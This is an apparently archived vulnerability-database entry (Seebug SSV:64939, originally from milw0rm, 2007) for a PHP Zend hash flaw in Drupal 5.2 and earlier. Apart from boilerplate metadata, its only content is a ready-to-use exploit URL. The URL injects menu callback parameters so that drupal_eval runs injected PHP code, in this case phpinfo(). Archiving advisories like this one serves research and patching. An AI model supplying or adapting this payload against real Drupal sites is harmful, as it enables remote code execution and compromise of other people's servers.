Drupal <= 5.2 PHP Zend Hash Vulnerability Exploitation Vector

2014-07-01T00:00:00
ID SSV:64939
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                Drupal <= 5.2 PHP Zend Hash Vulnerability Exploitation Vector

Example: http://www.example.com/drupal/?_menu[callbacks][1][callback]=drupal_eval&_menu[items][][type]=-1&-312030023=1&q=1/<?phpinfo();

# milw0rm.com [2007-10-10]